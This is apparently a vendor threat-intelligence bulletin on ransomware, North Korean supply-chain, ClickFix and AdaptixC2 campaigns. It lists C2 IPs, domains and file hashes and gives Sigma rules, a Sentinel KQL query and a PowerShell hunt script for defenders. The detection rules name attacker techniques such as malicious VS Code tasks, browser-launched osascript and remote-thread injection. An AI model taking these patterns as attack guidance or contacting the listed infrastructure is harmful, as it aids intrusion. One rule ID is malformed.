Recent OTX pulses indicate a convergence of high-activity threats focusing on initial access via software supply chains and credential theft to facilitate ransomware deployment. Key developments include:
- The Gentlemen RaaS: This group is actively exploiting CVE-2024-37085 (VMware ESXi) and critical FortiOS vulnerabilities (CVE-2024-55591, CVE-2025-32463) to gain initial access. Their TTPs involve maintaining a database of compromised devices and utilizing sophisticated defense evasion to deploy payloads like LockBit 5.0, Medusa, and Babuk.
- Void Dokkaebi (WageMole): A North Korean-aligned group has evolved into a self-propagating supply chain threat. They use fake job interviews to lure developers into cloning malicious repositories. The attack chain includes poisoned Git history and malicious VS Code task configurations (
tasks.) that execute malware (DEV#POPPER RAT, InvisibleFerret) automatically upon opening the project. - ClickFix Campaign: A surge in "Fake CAPTCHA" social engineering attacks targets macOS and Windows users. Victims are tricked into running PowerShell or AppleScript commands, leading to the deployment of infostealers that harvest credentials from 12+ browsers and 16+ crypto wallets.
- StepDrainer & AdaptixC2: While StepDrainer continues to target crypto assets via phishing domains, the AdaptixC2 framework is being adopted by APT groups for post-exploitation, utilizing Beacon Object Files (BOFs) and encrypted C2 channels over DNS/SMB.
The collective objective is clear: steal credentials (corporate and crypto) to facilitate lateral movement and data exfiltration prior to ransomware execution.
Threat Actor / Malware Profile
The Gentlemen (RaaS)
- Distribution: Exploitation of public-facing applications (FortiOS, FortiProxy, VMware ESXi).
- Payload: Multi-ransomware deployment (LockBit 5.0, Qilin, Vasa Locker).
- Behavior: Exploits CVE-2024-37085 to execute commands on ESXi hypervisors; uses custom tools for defense evasion and data exfiltration.
Void Dokkaebi (WageMole)
- Distribution: Supply chain attack via poisoned Git repositories; LinkedIn/social engineering fake job offers.
- Payload: DEV#POPPER RAT, InvisibleFerret, BeaverTail.
- Behavior: Abuses VS Code workspace trust to execute malicious tasks. Utilizes "worm propagation" to infect other repositories on the developer's machine.
ClickFix (macOS/Windows Infostealer)
- Distribution: Fake browser CAPTCHA pages leading to clipboard hijacking and script execution.
- Payload: AppleScript (macOS) / PowerShell (Windows) based infostealers.
- Behavior: Harvests keychain databases, browser cookies/credentials, and cryptocurrency wallet seed phrases.
AdaptixC2 Framework
- Type: Post-exploitation C2 framework.
- Behavior: Written in Go/C++; supports BOFs, process injection (T1055), and RC4 encrypted communication over HTTP, DNS, and SMB.
IOC Analysis
The provided pulses offer a mix of network and file-based indicators critical for defense:
-
Network Infrastructure (Void Dokkaebi/ClickFix/StepDrainer):
- Void Dokkaebi C2:
166.88.4.2,85.239.62.36,23.27.20.143,154.91.0.196. - ClickFix Infrastructure:
172.94.9.250(Voxility LLP),bull-run.fun,spot-wave.fun. - StepDrainer Phishing:
moonscan.live,scanclaw.live,aodefevrgdkhqltdnwgzbyjoywrlbntbhfwq.com. - Action: Block these IPs and domains at the perimeter and on endpoint firewalls. Investigate any historical egress connections to these IPs.
- Void Dokkaebi C2:
-
File Hashes (The Gentlemen/AdaptixC2):
- The Gentlemen:
3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235(SHA256). - AdaptixC2 Agent:
f212fd00d9ffc0f3d868845f7f4215cb(MD5). - ClickFix:
e12285f507c847b986233991b86b22e3(MD5). - Action: Scan endpoints for these hashes. Use EDR "Isolation" capabilities if found.
- The Gentlemen:
Detection Engineering
Sigma Rules
YAML
title: Potential Void Dokkaebi VS Code Exploitation
id: 6b7d3a1c-8f4e-4b2a-9c5d-1a2b3c4d5e6f
description: Detects suspicious processes spawned by VS Code (Code.exe) potentially indicating malicious task execution from poisoned repositories.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/6b7d3a1c8f4e4b2a9c5d1a2b3c4d5e6f/
tags:
- attack.execution
- attack.t1059.001
- attack.initial_access
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\Code.exe'
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\pwsh.exe'
- '\bash.exe'
- '\node.exe'
condition: selection
falsepositives:
- Legitimate developer scripts execution
level: high
---
title: macOS ClickFix AppleScript Execution
id: 7c8e4b2d-9f5e-5c3b-0d6e-2b3c4d5e6f7a
description: Detects execution of osascript triggered by common browsers, consistent with ClickFix social engineering campaigns.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/7c8e4b2d9f5e5c3b0d6e2b3c4d5e6f7a/
tags:
- attack.execution
- attack.t1059.002
- attack.user_execution
logsource:
category: process_creation
product: macos
detection:
selection:
ParentImage|contains:
- '/Google Chrome.app'
- '/Firefox.app'
- '/Safari.app'
- '/Microsoft Edge.app'
Image|endswith: '/osascript'
condition: selection
falsepositives:
- Legitimate automation extensions
level: critical
---
title: AdaptixC2 MgBot Process Injection
id: 8d9f5c3e-0g6f-6d4c-1e7f-3c4d5e6f7a8b
description: Detects potential AdaptixC2 or MgBot behavior characterized by suspicious remote thread creation often used in post-exploitation frameworks.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/8d9f5c3e0g6f6d4c1e7f3c4d5e6f7a8b/
tags:
- attack.defense_evasion
- attack.t1055.002
- attack.privilege_escalation
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'CreateRemoteThread'
- 'NtCreateThreadEx'
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\rundll32.exe'
filter_legit:
ParentImage|contains:
- '\Program Files\'
- '\System32\'
condition: selection and not filter_legit
falsepositives:
- Unknown
level: high
KQL (Microsoft Sentinel)
KQL — Microsoft Sentinel / Defender
// Hunt for Void Dokkaebi and ClickFix Network Indicators
let VoidIPs = pack_array("166.88.4.2", "85.239.62.36", "23.27.20.143", "23.27.202.27", "23.27.120.142", "154.91.0.196", "198.105.127.210", "83.168.68.219", "172.94.9.250");
let MaliciousDomains = pack_array("bull-run.fun", "spot-wave.fun", "moonscan.live", "scanclaw.live", "aodefevrgdkhqltdnwgzbyjoywrlbntbhfwq.com", "aahdjjsivunugynqjvyfbhqnjekniyfboma.com");
DeviceNetworkEvents
| where RemoteIP in (VoidIPs) or RemoteUrl has_any (MaliciousDomains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteIP, RemoteUrl, RemotePort
| order by Timestamp desc
PowerShell Hunt Script
PowerShell
<#
IOC Hunt Script for The Gentlemen, Void Dokkaebi, and AdaptixC2
Checks for file presence and active network connections to known C2 infrastructure.
#>
$TargetHashes = @(
"3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235", # The Gentlemen
"51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2", # The Gentlemen
"e12285f507c847b986233991b86b22e3", # ClickFix
"f212fd00d9ffc0f3d868845f7f4215cb" # AdaptixC2
)
$TargetIPs = @(
"166.88.4.2", "85.239.62.36", "23.27.20.143", "154.91.0.196", "172.94.9.250"
)
Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root
foreach ($Hash in $TargetHashes) {
Write-Host "Checking for Hash: $Hash" -ForegroundColor Yellow
foreach ($Drive in $Drives) {
try {
Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Length -gt 0 } |
ForEach-Object {
$FileHash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
if ($FileHash -eq $Hash) {
Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
}
}
} catch {
# Ignore access errors
}
}
}
Write-Host "[+] Checking active network connections for C2 IPs..." -ForegroundColor Cyan
$Connections = Get-NetTCPConnection -State Established
foreach ($IP in $TargetIPs) {
$Hits = $Connections | Where-Object { $_.RemoteAddress -eq $IP }
if ($Hits) {
Write-Host "[!] SUSPICIOUS CONNECTION FOUND to $IP" -ForegroundColor Red
$Hits | Format-Table LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess
}
}
Write-Host "Scan Complete." -ForegroundColor Green
---
Response Priorities
-
Immediate:
- Block all listed Void Dokkaebi IPs and ClickFix/StepDrainer domains at the firewall and proxy.
- Hunt for the listed file hashes on all endpoints; isolate any positive hits.
- Identify systems running FortiOS and patch CVE-2024-55591 and CVE-2025-32463 immediately.
-
24 Hours:
- Initiate credential reset and forced MFA re-enrollment for developer accounts who may have interacted with external Git repositories or "job interview" links.
- Review VS Code installation logs and workspace trust settings for developer workstations.
-
1 Week:
- Implement strict "allow-list" policies for Git repository cloning and VS Code extensions.
- Conduct security awareness training focused on "Fake Job Offer" social engineering and "Fake CAPTCHA" browser pop-ups.
- Segment ESXi management interfaces and hypervisor networks to mitigate The Gentlemen's lateral movement TTPs.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialsgentlemen-ransomwarevoid-dokkaebistepdrainerclickfixadaptixc2
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.